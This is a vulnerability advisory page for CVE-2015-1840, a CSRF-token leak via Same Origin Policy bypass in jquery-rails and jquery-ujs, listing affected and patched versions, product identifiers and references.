Moderate severityNVD Advisory· Published Jul 26, 2015· Updated Jun 17, 2026
CVE-2015-1840
CVE-2015-1840
Description
jquery_ujs.js in jquery-rails before 3.1.3 and 4.x before 4.0.4 and rails.js in jquery-ujs before 1.0.4, as used with Ruby on Rails 3.x and 4.x, allow remote attackers to bypass the Same Origin Policy, and trigger transmission of a CSRF token to a different-domain web server, via a leading space character in a URL within an attribute value.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
jquery-railsRubyGems | < 3.1.3 | 3.1.3 |
jquery-railsRubyGems | >= 4.0.0, < 4.0.4 | 4.0.4 |
jquery-ujsRubyGems | < 1.0.4 | 1.0.4 |
Affected products
12cpe:2.3:a:rubyonrails:jquery-rails:*:*:*:*:*:*:*:*+ 2 more
- cpe:2.3:a:rubyonrails:jquery-rails:*:*:*:*:*:*:*:*range: <=3.1.2
- cpe:2.3:a:rubyonrails:jquery-rails:4.0.0:*:*:*:*:*:*:*
- cpe:2.3:a:rubyonrails:jquery-rails:4.0.1:*:*:*:*:*:*:*
cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*+ 1 more
- cpe:2.3:o:fedoraproject:fedora:21:*:*:*:*:*:*:*
- cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
- ghsa-coords4 versionspkg:gem/jquery-railspkg:gem/jquery-ujspkg:rpm/opensuse/ruby3.2-rubygem-jquery-rails&distro=openSUSE%20Tumbleweedpkg:rpm/opensuse/rubygem-jquery-rails&distro=openSUSE%20Tumbleweed
< 3.1.3+ 3 more
- (no CPE)range: < 3.1.3
- (no CPE)range: < 1.0.4
- (no CPE)range: < 4.5.1-1.3
- (no CPE)range: < 4.5.0-1.1
Patches
Vulnerability mechanics
References
14- groups.google.com/forum/message/rawnvdExploitVendor AdvisoryWEB
- lists.fedoraproject.org/pipermail/package-announce/2015-June/160906.htmlnvdThird Party AdvisoryWEB
- lists.fedoraproject.org/pipermail/package-announce/2015-June/161043.htmlnvdThird Party AdvisoryWEB
- lists.opensuse.org/opensuse-updates/2015-07/msg00041.htmlnvdThird Party AdvisoryWEB
- github.com/advisories/GHSA-4whc-pp4x-9pf3ghsaADVISORY
- github.com/rails/jquery-rails/blob/master/CHANGELOG.mdnvdVendor AdvisoryWEB
- github.com/rails/jquery-ujs/blob/master/CHANGELOG.mdnvdVendor AdvisoryWEB
- nvd.nist.gov/vuln/detail/CVE-2015-1840ghsaADVISORY
- openwall.com/lists/oss-security/2015/06/16/15nvdWEB
- github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2015-1840.ymlghsaWEB
- github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-ujs/CVE-2015-1840.ymlghsaWEB
- groups.google.com/forum/ghsaWEB
- web.archive.org/web/20200228084945/http://www.securityfocus.com/bid/75239ghsaWEB
- www.securityfocus.com/bid/75239nvd
News mentions
0No linked articles in our index yet.